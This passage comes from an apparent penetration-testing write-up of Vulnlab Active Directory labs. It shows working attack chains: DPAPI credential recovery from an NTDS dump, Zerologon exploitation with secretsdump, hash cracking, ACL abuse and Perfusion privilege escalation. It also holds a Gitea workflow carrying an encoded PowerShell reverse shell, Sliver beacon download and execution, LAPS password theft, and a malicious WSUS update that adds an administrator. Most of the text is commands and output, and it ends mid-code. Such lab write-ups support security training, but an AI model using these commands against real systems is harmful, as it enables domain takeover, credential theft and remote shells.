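            "alg_hash": alg_hash, "salt_len": len(salt), "data_len": len(data), "sign_len": len(sign)}


def rdg_credential_blobs(rdg_xml: str) -> list:
    """Return (userName, parsed blob) for every credentialsProfile in an RDCMan file."""
    root = ET.fromstring(rdg_xml)
    result = []
    for prof in root.iter("credentialsProfile"):
        pw_b64 = prof.findtext("password")
        if pw_b64:
            result.append((prof.findtext("userName"), parse_dpapi_blob(base64.b64decode(pw_b64))))
    return result


# Constructed .rdg in the same layout as jenkins.rdg above, with the fake blob inserted.
_PW_B64 = base64.b64encode(build_fake_blob(MK_GUID, b"\x33" * 32)).decode()
SAMPLE_RDG = """<RDCMan programVersion="2.93" schemaVersion="3">
  <file>
    <credentialsProfiles>
      <credentialsProfile inherit="None">
        <profileName scope="Local">KLENDATHU\\administrator</profileName>
        <userName>administrator</userName>
        <password>{PW}</password>
        <domain>KLENDATHU</domain>
      </credentialsProfile>
    </credentialsProfiles>
  </file>
</RDCMan>""".replace("{PW}", _PW_B64)


if __name__ == "__main__":
    # usage: python3 rdg_mk.py jenkins.rdg   (falls back to the constructed sample)
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_RDG
    for user, info in rdg_credential_blobs(text):
        print(f"{user}: needs master key {info['masterkey_guid']} ({info['description']}, "
              f"crypt=0x{info['alg_crypt']:x}, hash=0x{info['alg_hash']:x}, {info['data_len']} bytes)")
```

The masterkey_guid names the file under Roaming/Microsoft/Protect/<SID>/ that rdgdec.py needs (the --masterkey directory used further down). That file is encrypted with jenkins' password, which we lack, but master keys of domain users carry a second copy wrapped with the domain backup key, which is why the NTDS.dit from the backup is dissected next.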

Next I used an Ubuntu box for the decryption.

.

puck@edge-meppel:~$ python3 -m venv venv
puck@edge-meppel:~$ source venv/bin/activate
(venv) puck@edge-meppel:~$ cd ntdissector/
(venv) puck@edge-meppel:~/ntdissector$ ntdissector -h
usage: ntdissector [-h] [-V] [-system SYSTEM] -ntds NTDS [-bootKey BOOTKEY] [-outputdir OUTPUTDIR]
                   [-cachedir CACHEDIR] [-f FILTER] [-filters] [-limit LIMIT] [-cn] [-debug] [-verbose] [-silent]
                   [-ts] [-keepDel] [-w WORKERS] [-nocache] [-dryRun]

NTDS Dissector v1.0

options:
  -h, --help            show this help message and exit
  -V, --version         Display version info

Examples:

> Dump users, groups and domain backup keys
$ ntdissector -ntds NTDS.dit -system SYSTEM -outputdir /tmp/ntdissector/ -ts -f user,group,secret

> Dump all records from the database
$ ntdissector -ntds NTDS.dit -system SYSTEM -outputdir /tmp/ntdissector/ -ts -f all

> Dump user objects and include deleted records
$ ntdissector -ntds NTDS.dit -system SYSTEM -outputdir /tmp/ntdissector/ -ts -f user -keepDel

> List object classes available to filter records
$ ntdissector -ntds NTDS.dit  -filters
(venv) puck@edge-meppel:~/ntdissector$ ntdissector -ntds /home/puck/ntds.dit -system /home/puck/SYSTEM -outputdir /tmp/test -ts -f all
[2024-08-30 15:25:27] [-] Couldn't load cache file /home/puck/.ntdissector/.cache/b872bd512882c00832b578725a57ca5c/__objectClassSchema.json -> [Errno 2] No such file or directory: '/home/puck/.ntdissector/.cache/b872bd512882c00832b578725a57ca5c/__objectClassSchema.json'
[2024-08-30 15:25:27] [*] Building the schemas, please wait...
[2024-08-30 15:25:29] [*] PEK # 0 found and decrypted: feab48d5655b005f0fed603c166c587f
[2024-08-30 15:25:29] [*] Filtering records with this list of object classes :  ['all']
[2024-08-30 15:25:29] [*] Ignoring records marked as deleted
100%|███████████████████████████████████████████████████████████████████████████| 3747/3747 [00:00<00:00, 7281.52rec./s]
[2024-08-30 15:25:30] [*] Finished, matched 3708 records out of 3747
[2024-08-30 15:25:30] [*] Processing 3708 serialization tasks
100%|████████████████████████████████████████████████████████████████████████████| 3708/3708 [00:17<00:00, 192.28rec./s]
(venv) puck@edge-meppel:~/ntdissector$

.

(venv) puck@edge-meppel:/tmp/test/out/b872bd512882c00832b578725a57ca5c$ cat secret.json | jq
{
  "lastSetTime": "2024-04-10T23:33:43.254871+00:00",
  "priorSetTime": "2024-04-10T23:33:43.254871+00:00",
  "dSCorePropagationData": "1601-01-01T00:00:00+00:00",
  "isCriticalSystemObject": 1,
  "showInAdvancedViewOnly": 1,
  "distinguishedName": "CN=BCKUPKEY_e6630be8-09ee-4a28-bcb1-e725e585d832 Secret,CN=System,DC=KLENDATHU,DC=VL",
  "objectClass": [
    "secret",
    "leaf",
    "top"
  ],
  "replPropertyMetaData": "01000000000000000c000000000000000000000001000000d7b2271c03000000c98b69a9c485a44f8204cfa32ce1e18e2<redacted>0010500000000000515000000bb79422646d3736071c6002d00020000",
  "objectGUID": "2a015493-fc08-40bc-b15e-d6936ba6bc59",
  "objectCategory": "CN=Secret,CN=Schema,CN=Configuration,DC=KLENDATHU,DC=VL"
}
(venv) puck@edge-meppel:/tmp/test/out/b872bd512882c00832b578725a57ca5c$

rdgdec.py from dpapilab-ng, fed the master key directory, the user's SID and the domain backup key (pvk) extracted from the NTDS dump:

(venv) puck@edge-meppel:~$ python3 ./rdgdec.py ./jenkins.rdg --masterkey /home/puck/Roaming/Microsoft/Protect/S-1-5-21-641890747-1618203462-755025521-1110 --sid S-1-5-21-641890747-1618203462-755025521-1110 -k ./pvk.key
[+] Profile:  KLENDATHU\administrator
    Username: administrator
    Domain:   KLENDATHU
    Password: @@M<redacted>s@@
-------------------------------------------------------------------------------
[+] Decrypted 1 out of 1 credentials

 

What a ride!

Used links:

https://github.com/ar0x4/impacket.git

https://github.com/synacktiv/ntdissector

https://github.com/tijldeneut/dpapilab-ng

vulnlab-retro2

Retro2 is an easy old-school Windows 2008 DC that involves decrypting an MS Access database, pre-created computer accounts, GenericWrite, AddMember and Perfusion.exe.

nmap scan

# Nmap 7.93 scan initiated Wed Aug 28 09:41:18 2024 as: nmap -Pn -sC -sV -oN retro2.nmap 10.10.122.16
Nmap scan report for 10.10.122.16
Host is up (0.019s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT      STATE SERVICE      VERSION
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2024-08-28 07:41:28Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: retro2.vl, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Windows Server 2008 R2 Datacenter 7601 Service Pack 1 microsoft-ds (workgroup: RETRO2)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: BLN01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   210: 
|_    Message signing enabled and required
|_clock-skew: mean: -40m00s, deviation: 1h09m16s, median: -1s
| smb-os-discovery: 
|   OS: Windows Server 2008 R2 Datacenter 7601 Service Pack 1 (Windows Server 2008 R2 Datacenter 6.1)
|   OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
|   Computer name: BLN01
|   NetBIOS computer name: BLN01\x00
|   Domain name: retro2.vl
|   Forest name: retro2.vl
|   FQDN: BLN01.retro2.vl
|_  System time: 2024-08-28T09:42:17+02:00
| smb2-time: 
|   date: 2024-08-28T07:42:18
|_  start_date: 2024-08-28T07:40:52
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Aug 28 09:42:57 2024 -- 1 IP address (1 host up) scanned in 99.04 seconds

 

unintended zerologon

The DC is unpatched for CVE-2020-1472 (Zerologon). Be aware that the exploit resets the DC's machine account password to an empty string, which breaks the DC's own secure channel; on a real engagement restore the original password afterwards.

┌──(puck㉿kali)-[~/vulnlab/retro2]
└─$ python3 cve-2020-1472-exploit.py bln01 10.10.122.16 
Performing authentication attempts...
===============================================================================================
Target vulnerable, changing account password to empty string

Result: 0

Exploit complete!

secretsdump with the now-empty machine account password

┌──(puck㉿kali)-[~/vulnlab/retro2]
└─$ impacket-secretsdump -just-dc -no-pass bln01\$@10.10.122.16     
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c0<redacted>48:::

enumerate SMB shares

┌──(puck㉿kali)-[~/vulnlab/retro2]
└─$ netexec smb 10.10.122.16         
SMB         10.10.122.16    445    BLN01            [*] Windows Server 2008 R2 Datacenter 7601 Service Pack 1 x64 (name:BLN01) (domain:retro2.vl) (signing:True) (SMBv1:True)

.

┌──(puck㉿kali)-[~/vulnlab/retro2]
└─$ netexec smb 10.10.122.16 -u 'puck' -p '' --shares 
SMB         10.10.122.16    445    BLN01            [*] Windows Server 2008 R2 Datacenter 7601 Service Pack 1 x64 (name:BLN01) (domain:retro2.vl) (signing:True) (SMBv1:True)
SMB         10.10.122.16    445    BLN01            [+] retro2.vl\puck: 
SMB         10.10.122.16    445    BLN01            [*] Enumerated shares
SMB         10.10.122.16    445    BLN01            Share           Permissions     Remark
SMB         10.10.122.16    445    BLN01            -----           -----------     ------
SMB         10.10.122.16    445    BLN01            ADMIN$                          Remote Admin
SMB         10.10.122.16    445    BLN01            C$                              Default share
SMB         10.10.122.16    445    BLN01            IPC$                            Remote IPC
SMB         10.10.122.16    445    BLN01            NETLOGON                        Logon server share 
SMB         10.10.122.16    445    BLN01            Public          READ            
SMB         10.10.122.16    445    BLN01            SYSVOL                          Logon server share 

.

┌──(puck㉿kali)-[~/vulnlab/retro2]
└─$ impacket-smbclient guest@retro2.vl -no-pass
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Type help for list of commands
# use Public
# ls
drw-rw-rw-          0  Sat Aug 17 16:30:37 2024 .
drw-rw-rw-          0  Sat Aug 17 16:30:37 2024 ..
drw-rw-rw-          0  Sat Aug 17 16:30:37 2024 DB
drw-rw-rw-          0  Sat Aug 17 13:58:07 2024 Temp
# cd DB
# ls
drw-rw-rw-          0  Sat Aug 17 16:30:37 2024 .
drw-rw-rw-          0  Sat Aug 17 16:30:37 2024 ..
-rw-rw-rw-     876544  Sat Aug 17 16:30:34 2024 staff.accdb
# get staff.accdb

If we open it with Microsoft Access, it prompts for a password.  We use office2john to extract the hash and then crack it.

┌──(puck㉿kali)-[~/vulnlab/retro2]
└─$ office2john staff.accdb | tee officehash
staff.accdb:$office$*2013*100000*256*16*5736<redacted>8235

┌──(puck㉿kali)-[~/vulnlab/retro2]
└─$ john officehash.txt --wordlist=/usr/share/wordlists/rockyou.txt  
Using default input encoding: UTF-8
Loaded 1 password hash (Office, 2007/2010/2013 [SHA1 256/256 AVX2 8x / SHA512 256/256 AVX2 4x AES])
Cost 1 (MS Office version) is 2013 for all loaded hashes
Cost 2 (iteration count) is 100000 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:03 0.00% (ETA: 06:07:07) 0g/s 223.4p/s 223.4c/s 223.4C/s bambam..james1
cl<redacted>08          (staff.accdb)     

In the accdb we find:
strsUser = "retro2\ldapreader"
strsPassword = "pp<redacted>5R"

Bloodhound analysis

bloodhound-python -d retro2.vl -c all -u ldapreader -p pp<redacted>5R -ns 10.10.122.16 --dns-tcp --zip

we find:

The computer Account FS01 is a member of the Domain Computers group.
The Domain Computers group has GenericWrite over ADMWS01.
ADMWS01 has the AddSelf permission over the Services group.
Services group members can RDP to DC BLN01

.

We guessed that the pre-created computer account FS01 has its lowercase name (fs01) as password. We cannot use the account as-is because that initial password has never been changed, so we change it with rpcchangepwd.py:

wget https://raw.githubusercontent.com/api0cradle/impacket/a1d0cc99ff1bd4425eddc1b28add1f269ff230a6/examples/rpcchangepwd.py

.

┌──(puck㉿kali)-[~/vulnlab/retro2]
└─$ python3 rpcchangepwd.py retro2.vl/fs01\$:fs01@10.10.122.16 -newpass P@ssw0rd 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Password was changed successfully.

Verify the new password, then abuse the GenericWrite that Domain Computers hold over ADMWS01 to set a password on that computer account as well:

┌──(puck㉿kali)-[~/vulnlab/retro2]
└─$ netexec smb retro2.vl -u 'fs01$' -p 'P@ssw0rd'
SMB         10.10.122.16    445    BLN01            [*] Windows Server 2008 R2 Datacenter 7601 Service Pack 1 x64 (name:BLN01) (domain:retro2.vl) (signing:True) (SMBv1:True)
SMB         10.10.122.16    445    BLN01            [+] retro2.vl\fs01$:P@ssw0rd 

.

┌──(puck㉿kali)-[~/vulnlab/retro2]
└─$  net rpc password 'ADMWS01$' Passw0rd1 -U retro2.vl/'fs01$'%P@ssw0rd -S bln01.retro2.vl 

.

┌──(puck㉿kali)-[~/vulnlab/retro2]
└─$ netexec smb retro2.vl -u 'ADMWS01$' -p 'P@ssw0rd'                                  
SMB         10.10.122.16    445    BLN01            [*] Windows Server 2008 R2 Datacenter 7601 Service Pack 1 x64 (name:BLN01) (domain:retro2.vl) (signing:True) (SMBv1:True)
SMB         10.10.122.16    445    BLN01            [-] retro2.vl\ADMWS01$:P@ssw0rd STATUS_LOGON_FAILURE 

.

The failed check above is only a typo in the test (the password we set is Passw0rd1, not P@ssw0rd). Authenticating as ADMWS01$ with Passw0rd1, we use BloodyAD to add 'ldapreader' to the Services group:

┌──(puck㉿kali)-[~/vulnlab/delegate/krbrelayx/bloodyAD]
└─$ python3 bloodyAD.py --host 10.10.122.16 -d retro2.vl -u 'ADMWS01$' -p 'Passw0rd1' add groupMember 'SERVICES' 'ldapreader'
[+] ldapreader added to SERVICES

As a member of Services, ldapreader can now RDP to the DC BLN01:

┌──(puck㉿kali)-[~/vulnlab/retro2]
└─$  xfreerdp /u:'ldapreader' /p:'pp<redacted>5R' /v:10.10.122.16 /d:retro2.vl /tls-seclevel:0 

Privesc

The DC is Windows Server 2008 R2, which is the target of itm4n's Perfusion. On Windows 7 / Server 2008 R2 any local user can create a Performance subkey under the RpcEptMapper (or DnsCache) service key in HKLM\SYSTEM\CurrentControlSet\Services; the Windows performance-counter mechanism then loads the DLL named there in the context of the WMI service as NT AUTHORITY\SYSTEM (hence the tool's name). We fetch Perfusion.exe and run it with an interactive cmd as payload:

c:\temp>certutil.exe -urlcache -f http://10.8.2.138:8000/Perfusion.exe Perfusion.exe
****  Online  ****
CertUtil: -URLCache command completed successfully.

c:\temp> .\Perfusion.exe -c cmd -i
[*] Created Performance DLL: C:\Users\LDAPRE~1\AppData\Local\Temp\2\performance_2844_2224_2.dll
[*] Created Performance registry key.
[*] Triggered Performance data collection.
[+] Exploit completed. Got a SYSTEM token! :)
[*] Waiting for the Trigger Thread to terminate... OK
[!] Failed to delete Performance registry key.
[*] Deleted Performance DLL.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

c:\temp>whoami
nt authority\system

c:\temp>type c:\users\administrator\desktop\root.txt
VL{fc<redacted>46}

That was oldschool fun

vulnlab-tea

vulnlab-tea

A medium-rated AD chain. srv.tea.vl runs a Gitea instance with an active Actions runner; after registering a user and enabling Actions on our own repository, a pushed workflow executes commands on the runner and gives us a reverse shell. From there: Get-LapsADPassword -> SharpWSUS.exe -> domain admin on dc.tea.vl.

.

giteabuild

Create a .gitea/workflows/demo.yaml file in the repository we created; the runner picks it up on the next push.

http://srv.tea.vl:3000/puck/puck/src/branch/main/.gitea/workflows/demo.yaml

name: Build
run-name: ${{ gitea.actor }} running build job
on: [push]

jobs:
  Explore-Gitea-Actions:
    runs-on: windows-latest
    steps:
      - run: echo "🍏 This job's status is ${{ job.status }}."
      - run: powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AOAAuADIALgAxADMAOAAiACwANAA0ADMAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA

catch with netcat

┌──(puck㉿kali)-[~/vulnlab/tea]
└─$ rlwrap nc -nlvp 443                         
listening on [any] 443 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.191.134] 50061

PS C:\Users\thomas.wallace\.cache\act\63805091085fb29f\hostexecutor> whoami
tea\thomas.wallace

download & execute Beacon

PS C:\_install> iwr http://10.8.2.138:8000/beacon.exe -o beacon.exe
PS C:\_install> ./beacon.exe

Sliver

┌──(puck㉿kali)-[~/vulnlab/tea]
└─$ sliver                    
Connecting to localhost:31337 ...
[*] Loaded 21 aliases from disk
[*] Loaded 128 extension(s) from disk

    ███████╗██╗     ██╗██╗   ██╗███████╗██████╗
    ██╔════╝██║     ██║██║   ██║██╔════╝██╔══██╗
    ███████╗██║     ██║██║   ██║█████╗  ██████╔╝
    ╚════██║██║     ██║╚██╗ ██╔╝██╔══╝  ██╔══██╗
    ███████║███████╗██║ ╚████╔╝ ███████╗██║  ██║
    ╚══════╝╚══════╝╚═╝  ╚═══╝  ╚══════╝╚═╝  ╚═╝

All hackers gain vigilance
[*] Server v1.5.42 - 85b0e870d05ec47184958dbcb871ddee2eb9e3df
[*] Welcome to the sliver shell, please type 'help' for options

[*] Check for updates with the 'update' command

sliver > https --lport 8443

[*] Starting HTTPS :8443 listener ...

[*] Successfully started job #1

   
sliver > jobs

 ID   Name    Protocol   Port   Stage Profile 
==== ======= ========== ====== ===============
 1    https   tcp        8443                 


sliver > generate beacon --seconds 5 --jitter 3 --os windows --arch amd64 --format EXECUTABLE --http 10.8.2.138:8443 --name tea-3 --save /tmp/beacon.exe -G --skip-symbols

[*] Generating new windows/amd64 beacon implant binary (5s)
[!] Symbol obfuscation is disabled
[*] Build completed in 2s
[*] Implant saved to /tmp/beacon.exe

sliver > jobs

 ID   Name    Protocol   Port   Stage Profile 
==== ======= ========== ====== ===============
 1    https   tcp        8443                 

[*] Beacon 9d553a10 tea-3 - 10.10.191.134:50348 (SRV) - windows/amd64 - Tue, 20 Aug 2024 10:25:18 CEST

sliver > use 9d553a10

[*] Active beacon tea-3 (9d553a10-504e-4b41-927f-34a21b1a94bc)

sliver (tea-3) > ls

[*] Tasked beacon tea-3 (2cdcbb9d)

[+] tea-3 completed task 2cdcbb9d

C:\_install (6 items, 24.0 MiB)
===============================
-rw-rw-rw-  beacon.exe                 10.5 MiB   Tue Aug 20 01:16:47 -0700 2024
-rw-rw-rw-  beacon2.exe                10.5 MiB   Tue Aug 20 01:24:56 -0700 2024
-rw-rw-rw-  LAPS.x64.msi               1.1 MiB    Sun Dec 24 06:37:30 -0700 2023
-rw-rw-rw-  LAPS_OperationsGuide.docx  626.3 KiB  Sun Dec 24 06:37:39 -0700 2023
-rw-rw-rw-  PsExec64.exe               813.9 KiB  Sun Oct 22 06:03:38 -0700 2023
-rw-rw-rw-  PsInfo64.exe               523.4 KiB  Sun Dec 24 06:38:30 -0700 2023



sliver (tea-3) > sharp-hound-4 -i -s -t 120 -- -c all,gpolocalgroup

[*] Tasked beacon tea-3 (6338fcbb)

[+] tea-3 completed task 6338fcbb

[*] sharp-hound-4 output:
2024-08-20T01:27:54.2810142-07:00|INFORMATION|This version of SharpHound is compatible with the 5.0.0 Release of BloodHound
2024-08-20T01:27:54.9376664-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, UserRights, CARegistry, DCRegistry, CertServices
--snip--
2024-08-20T01:28:41.7584223-07:00|INFORMATION|Status: 309 objects finished (+309 6.866667)/s -- Using 69 MB RAM
2024-08-20T01:28:41.7687327-07:00|INFORMATION|Enumeration finished in 00:00:45.8844244
2024-08-20T01:28:41.8847345-07:00|INFORMATION|Saving cache with stats: 250 ID to type mappings.
 254 name to SID mappings.
 2 machine sid mappings.
 2 sid to domain mappings.
 0 global catalog mappings.
2024-08-20T01:28:41.9476974-07:00|INFORMATION|SharpHound Enumeration Completed at 1:28 AM on 8/20/2024! Happy Graphing!

[*] Output saved to /tmp/sharp-hound-4_.3130027413.log

sliver (tea-3) > ls

[*] Tasked beacon tea-3 (3f00e892)

[+] tea-3 completed task 3f00e892

C:\_install (8 items, 24.0 MiB)
===============================
-rw-rw-rw-  20240820012840_BloodHound.zip                         23.2 KiB   Tue Aug 20 01:28:41 -0700 2024
-rw-rw-rw-  beacon.exe                                            10.5 MiB   Tue Aug 20 01:16:47 -0700 2024
-rw-rw-rw-  beacon2.exe                                           10.5 MiB   Tue Aug 20 01:24:56 -0700 2024
-rw-rw-rw-  LAPS.x64.msi                                          1.1 MiB    Sun Dec 24 06:37:30 -0700 2023
-rw-rw-rw-  LAPS_OperationsGuide.docx                             626.3 KiB  Sun Dec 24 06:37:39 -0700 2023
-rw-rw-rw-  NjdkNDliNTgtOWQ5Mi00ZTViLWI2NzctOWJlODE4OTM4ZGMy.bin  42.8 KiB   Tue Aug 20 01:28:41 -0700 2024
-rw-rw-rw-  PsExec64.exe                                          813.9 KiB  Sun Oct 22 06:03:38 -0700 2023
-rw-rw-rw-  PsInfo64.exe                                          523.4 KiB  Sun Dec 24 06:38:30 -0700 2023


sliver (tea-3) > download 20240820012840_BloodHound.zip

[*] Tasked beacon tea-3 (d8c023fe)

[+] tea-3 completed task d8c023fe

[*] Wrote 23731 bytes (1 file successfully, 0 files unsuccessfully) to /home/puck/vulnlab/tea/20240820012840_BloodHound.zip


.

sliver (tea-3) > interactive

[*] Using beacon's active C2 endpoint: https://10.8.2.138:8443
[*] Tasked beacon tea-3 (d48d0ac7)

[*] Session 67a7541b tea-3 - 10.10.163.246:53086 (SRV) - windows/amd64 - Thu, 22 Aug 2024 09:21:51 CEST

sliver (tea-3) > use 67a7541b-db54-4c92-a36a-b6baec828a14

[*] Active session tea-3 (67a7541b-db54-4c92-a36a-b6baec828a14)

sliver (tea-3) > shell

? This action is bad OPSEC, are you an adult? Yes

[*] Wait approximately 10 seconds after exit, and press <enter> to continue
[*] Opening shell tunnel (EOF to exit) ...

[*] Started remote shell with pid 4600

PS C:\_install> Get-LAPSADPassword -Identity SRV -AsPlainText

Get-LAPSADPassword -Identity SRV -AsPlainText

ComputerName        : SRV
DistinguishedName   : CN=SRV,OU=Servers,DC=tea,DC=vl
Account             : Administrator
Password            : %t50Z))o4+0Z;6
PasswordUpdateTime  : 8/21/2024 11:53:03 PM
ExpirationTimestamp : 9/20/2024 11:53:03 PM
Source              : EncryptedPassword
DecryptionStatus    : Success
AuthorizedDecryptor : TEA\Server Administration

PS C:\_install> 

.

The LAPS password used below differs from the one just shown: LAPS rotates the local Administrator password, and these commands were run in a separate session of the lab.

netexec winrm srv.tea.vl -u administrator -p 'rr<redacted>S9' --local
WINRM       10.10.191.134   5985   SRV              [*] Windows Server 2022 Build 20348 (name:SRV) (domain:tea.vl)
WINRM       10.10.191.134   5985   SRV              [+] SRV\administrator:rr<redacted>S9 (Pwn3d!)

.

evil-winrm -i srv.tea.vl -u administrator -p 'rr<redacted>S9'

or

xfreerdp /u:Administrator /p:rr<redacted>S9 /w:1566 /h:968 /v:srv.tea.vl:3389

We are local admin on SRV, but not yet on the DC. SRV is also the WSUS server (port 8530, as the enumeration output further down shows), so we stage SharpWSUS on it to push a malicious "update" to dc.tea.vl:

iwr http://10.8.2.138:8000/SharpWSUS.exe -o sharpwsus.exe

.

SharpWSUS

sharpwsus locate

sharpwsus inspect

sharpwsus create /payload:"C:\Users\Administrator\Documents\psexec64.exe" /args:"-accepteula -s -d cmd.exe /c \\"net user puck Password123! /add && net localgroup administrators puck /add \"" /title:"Great UpdateC21" /date:2024-08-23 /kb:700123 /rating:Important /description:"Really important update" /url:"https://google.com"

sharpwsus approve /updateid:9e21a26a-1cbe-4145-934e-d8395acba567 /computername:dc.tea.vl /groupname:"Awesome Group C2"

sharpwsus check /updateid:9e21a26a-1cbe-4145-934e-d8395acba567 /computername:dc.tea.vl

sharpwsus delete /updateid:9e21a26a-1cbe-4145-934e-d8395acba567 /computername:dc.tea.vl /groupname:"Awesome Group C2"

.

A note on quoting before the run below. The create command was typed at a cmd.exe prompt, and cmd.exe has no backslash escape for double quotes; a quote is only a toggle. The \\" after /c therefore closes the quoted /args value, which leaves the && unquoted. cmd.exe splits the line there: SharpWSUS receives only "-accepteula -s -d cmd.exe /c \net" as arguments (see the Arguments: line in its output), and the remainder, net localgroup administrators puck /add " /title:..., is executed locally on SRV, which produces the "There is no such global user or group" errors. The update that eventually ran on the DC added the account puckie with password Start123!, which the rest of the chain uses; that corrected create command is not shown here. A payload that needs no nested quoting (a single executable or batch file already on disk) avoids the problem altogether.

C:\_install>sharpwsus create /payload:"C:\Users\Administrator\Documents\psexec64.exe" /args:"-accepteula -s -d cmd.exe /c \\"net user puck Password123! /add && net localgroup administrators puck /add \"" /title:"Great UpdateC21"

 ____  _                   __        ______  _   _ ____
/ ___|| |__   __ _ _ __ _ _\ \      / / ___|| | | / ___|
\___ \| '_ \ / _` | '__| '_ \ \ /\ / /\___ \| | | \___ \
 ___) | | | | (_| | |  | |_) \ V  V /  ___) | |_| |___) |
|____/|_| |_|\__,_|_|  | .__/ \_/\_/  |____/ \___/|____/
                       |_|
           Phil Keeble @ Nettitude Red Team

[*] Action: Create Update
C:\WSUS-Updates\WsusContent
[*] Creating patch to use the following:
[*] Payload: psexec64.exe
[*] Payload Path: C:\Users\Administrator\Documents\psexec64.exe
[*] Arguments: -accepteula -s -d cmd.exe /c \net
[*] Arguments (HTML Encoded): -accepteula -s -d cmd.exe /c \net

################# WSUS Server Enumeration via SQL ##################
ServerName, WSUSPortNumber, WSUSContentLocation
-----------------------------------------------
SRV, 8530, C:\WSUS-Updates\WsusContent

ImportUpdate
Update Revision ID: 198781
PrepareXMLtoClient
InjectURL2Download
DeploymentRevision
PrepareBundle
PrepareBundle Revision ID: 198782
PrepareXMLBundletoClient
DeploymentRevision

[*] Update created - When ready to deploy use the following command:
[*] SharpWSUS.exe approve /updateid:2aff56d0-6c1c-48ab-ac73-ab0483182818 /computername:Target.FQDN /groupname:"Group Name"

[*] To check on the update status use the following command:
[*] SharpWSUS.exe check /updateid:2aff56d0-6c1c-48ab-ac73-ab0483182818 /computername:Target.FQDN

[*] To delete the update use the following command:
[*] SharpWSUS.exe delete /updateid:2aff56d0-6c1c-48ab-ac73-ab0483182818 /computername:Target.FQDN /groupname:"Group Name"

[*] Create complete

There is no such global user or group: puck.

There is no such global user or group: " /title:Great.

There is no such global user or group: UpdateC21.

More help is available by typing NET HELPMSG 3783.
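Why that first create went wrong, as an added example (our own code, not SharpWSUS's): a simplified model of the two parsers the line passes through, first cmd.exe (quote toggling, caret escapes, command separators) and then the Microsoft C runtime's argv splitting. Run on the line from the page it yields two commands and a truncated /args, matching the output above. The FIXED variant, which escapes && with carets and uses \" for the inner quotes, survives both parsers in the model; it is an assumption derived from the parsing rules and was not run against the lab.

```python
# Added example, not part of SharpWSUS. Simplified model of:
#   1. cmd.exe: a double quote toggles quoting (no backslash escape exists),
#      ^ outside quotes escapes the next character, and & && | || outside
#      quotes separate commands.
#   2. The Microsoft C runtime's argv splitting: 2n backslashes before a quote
#      give n backslashes plus a quote toggle; 2n+1 give n backslashes plus a
#      literal quote; backslashes not followed by a quote are literal.
# Rarer rules (variable expansion, the "" rule inside quotes) are omitted.


def cmd_split(line):
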